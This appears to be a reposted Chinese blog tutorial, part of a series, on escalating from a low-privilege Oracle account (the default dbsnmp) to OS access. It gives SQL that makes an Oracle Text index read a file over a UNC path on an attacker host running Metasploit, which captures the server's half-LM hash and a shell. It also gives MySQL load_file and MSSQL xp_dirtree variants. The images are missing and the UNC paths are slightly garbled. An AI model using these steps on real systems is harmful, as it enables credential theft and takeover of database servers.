使用低权限 Oracle 数据库账户得到 OS 访问权限

核心提示： 图片看不清楚？请点击这里查看原图（大图），图片看不清楚？请点击这里查看原图（大图），使用低权限 Oracle 数据库账户得到 OS 访问权限(2)，3.我现在使用 dbsnmp 默认账户连接到 oracle 数据库上，这个账户默认权限是比较低的，如果有注入，服务又是 administrat

图片看不清楚？请点击这里查看原图（大图）。

图片看不清楚？请点击这里查看原图（大图）。

3.我现在使用 dbsnmp 默认账户连接到 oracle 数据库上，这个账户默认权限是比较低的，只有 connect 和 resource 权限。

图片看不清楚？请点击这里查看原图（大图）。

4.然后执行下面 3 条 SQL 语句

SQL> CREATE TABLE files(id NUMBER PRIMARY KEY,path VARCHAR(255)

UNIQUE,ot_format VARCHAR(6));

SQL> INSERT INTO files VALUES(1,’\192.168.1.52mickey’,NULL);

SQL>CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys.context

2　　PARAMETERS(’datastore ctxsys.file_datastore format column ot_format’);

图片看不清楚？请点击这里查看原图（大图）。

当执行完 create index 这句的时候，在看咱们本地的 metasploit，就已经得到 ORACLE 数据库主机的系统当前服务用户的 half lm 哈希和 cmdshell 了。

图片看不清楚？请点击这里查看原图（大图）。

图片看不清楚？请点击这里查看原图（大图）。

后来经过 pt007 的提醒，我又测试了 mysql,如果服务也是 administrator 启动的，用select load_file(’\\192.168.1.52mk.txt’)也是可以得到系统权限的.MSSQL 应该用 xp_dirtree 存储过程 也是可以的，不过我没有配置出来用 administrator 账户启动 MSSQL 服务，希望知道的朋友指点下我。 这个技术可以用到内网 WEB 评估的时候，如果有注入，服务又是 administrator 启动的，可以提权了。